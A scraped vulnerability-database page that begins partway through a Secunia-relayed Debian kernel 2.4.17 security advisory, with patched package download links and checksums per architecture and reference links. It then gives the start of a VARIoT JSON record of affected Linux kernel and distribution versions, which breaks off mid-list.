http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.5_all.deb Size/MD5 checksum: 24455128 ed5362b12c6327295cd89027ff8e80ab http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.18_all.deb Size/MD5 checksum: 24735538 cf9ddb702811464ac2dd2231512053f9 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7_all.deb Size/MD5 checksum: 1151866 6f2575f26e7800e1e7a7cafdaf02b3a6 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4_all.deb Size/MD5 checksum: 300202 0f5db53cdab20024b4a3a75bd0799b1a http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody4_all.deb Size/MD5 checksum: 1708122 7d18878351662289ac0841e0ad8f10f4 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4_all.deb Size/MD5 checksum: 23972270 a0bf4a2796a9b49c36579166e6a72d62

HP Precision architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.5_hppa.deb Size/MD5 checksum: 3523044 63c790a70164e579c8bb3b8a08ea69b5 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.5_hppa.deb Size/MD5 checksum: 2869994 e9e2be22d5fdf40f2e879570adc1132d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.5_hppa.deb Size/MD5 checksum: 3006192 cf53ac718c6ed26a59802e74c5926f00 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.5_hppa.deb Size/MD5 checksum: 3029436 d0e0fd747af9ff7a3633ee9cc6b1f1e6 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.5_hppa.deb Size/MD5 checksum: 3170356 ca408698a580463da3a547b2f87006e4 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_hppa.deb Size/MD5 checksum: 16886 437018078d9d01e25702cf1a20c23414

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.18_ia64.deb Size/MD5 checksum: 3638280 b6cd4e0d4129b6f4d0734253818cd828 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.18_ia64.deb Size/MD5 checksum: 7026800 55e4cd610c06297c7132ce2aeb88d029 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.18_ia64.deb Size/MD5 checksum: 7172892 a66f94c18d8ee4354e9446655837c72a http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.18_ia64.deb Size/MD5 checksum: 7014470 d99cc0f293c747a295230de934328007 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.18_ia64.deb Size/MD5 checksum: 7165570 997a9dbf17821067de6ceb65548e7c2b http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody4_ia64.deb Size/MD5 checksum: 21616 1eab80187061fbd304b6328533d7dc33

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-headers-2.4.17_2.4.17-2.woody.5_s390.deb Size/MD5 checksum: 3379418 74817217abf90896eb63d6c6792839fe http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5_s390.deb Size/MD5 checksum: 1346190 39433c757763336b6c14bf0d00652596 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_s390.deb Size/MD5 checksum: 16404 9cfcf10a2a2ef99bbb009a650cddd227

PowerPC architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-headers-2.4.17-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 3409712 698750e3998ee3792db43f445a8a8d96 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-2.4.17-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 2211146 103890e43508a5913a10ff8be80e9cdc http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 4602 31ef3f45675fc13836337dee97486e20 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 490842 799441a4e49b88f780353d7aff9f29d2 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_powerpc.deb Size/MD5 checksum: 16280 4e54c040bc83523d8122287bab6df7a5

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mips.deb Size/MD5 checksum: 3523520 45f001c255a3a66f22148d84d035abb1 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody7_mips.deb Size/MD5 checksum: 2045436 c840c6ff8c9e3ab455d38021d09a391d http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody7_mips.deb Size/MD5 checksum: 2045226 709ccbc6754644fa448c93058f0df504 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mips.deb Size/MD5 checksum: 16556 019623b1dbc75bff84d7f056435dc6db

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 3522422 2118440d1658730fd93f47867848573c http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 2200968 63bc732deee6df19b83f10a50485a476 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 2195278 697eb9b05f765c332eca175284eb24b8 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 17836 61df1f292dccb4e64cb956a629f729fc http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mipsel.deb Size/MD5 checksum: 16558 f8382b01aca2c535988b5ab5709dae90

Alpha architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_alpha.deb Size/MD5 checksum: 17180 7d1cf8fb24431c01f45fadf7becb6d2e

ARM architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_arm.deb Size/MD5 checksum: 15878 fcf97ed103c205699fb5396c3a49e293

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_i386.deb Size/MD5 checksum: 15518 2e7d50090a469a84ef7f3ae8aa97b85f

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_m68k.deb Size/MD5 checksum: 15368 41a11620bf7ea34b15742ccf59ff6895

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_sparc.deb Size/MD5 checksum: 18356 71b076d3eeff837bfb54a7f538b11b58

ORIGINAL ADVISORY: http://www.us.debian.org/security/2006/dsa-1082

OTHER REFERENCES: SA10533: http://secunia.com/advisories/10533/

SA11464: http://secunia.com/advisories/11464/

SA11861: http://secunia.com/advisories/11861/

SA11943: http://secunia.com/advisories/11943/

SA13232: http://secunia.com/advisories/13232/

SA13469: http://secunia.com/advisories/13469/

SA13126: http://secunia.com/advisories/13126/

SA13308: http://secunia.com/advisories/13308/

SA13627: http://secunia.com/advisories/13627/

SA13756: http://secunia.com/advisories/13756/

SA13493: http://secunia.com/advisories/13493/

SA13822: http://secunia.com/advisories/13822/

SA14295: http://secunia.com/advisories/14295/

SA14570: http://secunia.com/advisories/14570/

SA13784: http://secunia.com/advisories/13784/


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200501-0463",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "mandrakesoft",
        "version": "9.2"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "mandrakesoft",
        "version": "10.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "converged communications server",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "s8710",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.1"
      },
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "modular messaging message storage server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "fedora core",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "core_1.0"
      },
      {
        "model": "mandrake multi network firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.2"
      },
      {
        "model": "s8710",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "mn100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "conectiva",
        "version": "10.0"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "intuity audix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.24_ow1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "9.0"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "10.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "1.0"
      },
      {
        "model": "fedora core",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "core_3.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6_test9_cvs"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.23_ow2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ubuntu",
        "version": "4.1"
      },
      {
        "model": "network routing",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "modular messaging message storage server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "fedora core",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "core_2.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "10"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "7"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "8"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "4.1"
      },
      {
        "model": "linux ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "4.1"
      },
      {
        "model": "linux ia32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "4.1"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "9"
      },
      {
        "model": "linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "1.0"
      },
      {
        "model": "novell linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.2"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.1"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.2"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "9.0"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "fedora core3",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "fedora core2",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "fedora core1",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.1"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
